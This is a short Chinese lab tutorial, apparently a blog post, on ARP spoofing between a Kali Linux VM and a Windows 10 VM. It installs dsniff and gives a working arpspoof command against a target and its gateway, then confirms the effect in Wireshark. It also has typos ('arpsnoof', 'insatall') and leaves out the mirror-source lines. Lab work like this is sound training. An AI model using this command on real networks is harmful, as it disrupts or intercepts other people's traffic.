1、使用arpsnoof工具
准备两台虚拟机,一台win10作为被攻击主机,一台kali linux作为攻击主机,确保两台主机都通网,可以互相通信,这里我们两台主机都是NAT模式
在kali Linux上安装工具:
配置apt源
sudo root取得管理员权限
然后vim /etc/apt/sources.list进入编辑
添加中科院源:
更新源:# apt-get update
接下来安装工具:apt-get -y insatall dsniff
2.开始攻击:
确认win10可以访问公网:
在kali上实施arp攻击
arpspoof -i eth0 -t 192.168.226.235 192.168.226.2
#-i 接口名称
#-t 攻击主机目标地址和网关地址
已无法访问网页:
3.流量分析:
win10主机上使用wireshark抓取流量筛选arp流量
可以看出kali的MAC地址对应了网关的ip地址